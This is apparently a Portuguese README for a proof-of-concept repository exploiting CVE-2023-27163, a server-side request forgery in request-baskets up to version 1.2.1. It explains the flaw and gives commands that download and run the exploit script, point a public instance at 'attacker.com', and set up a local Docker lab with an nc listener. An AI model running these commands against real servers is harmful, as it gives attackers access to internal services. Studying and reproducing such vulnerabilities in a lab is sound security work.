
Prova de Conceito para Falsificação de Requisição no Lado do Servidor (SSRF) no request-baskets (<= v.1.2.1)
Este repositório contém uma Prova de Conceito (PoC) para CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) descoberta no request-baskets até a versão 1.2.1. Esta vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis explorando o componente /api/baskets/{name} através de uma requisição API manipulada.
Créditos para @b33t1e, @chelinboo147 e @houqinsheng (veja o artigo).
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/
Request-baskets é uma aplicação web construída para coletar e registrar requisições em uma rota específica, chamada de basket. Ao criá-la, o usuário pode especificar outro servidor para encaminhar a requisição. O problema aqui é que o usuário pode especificar serviços não intencionais, como aplicações fechadas na rede.
Por exemplo: suponha que o servidor hospede o Request-baskets (porta 55555) e um servidor web Flask na porta 8000. O Flask também está configurado para interagir apenas com localhost. Ao criar um basket que encaminha para http://localhost:8000, o atacante pode acessar o servidor web Flask anteriormente restrito.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
Este projeto está sob a Unlicense.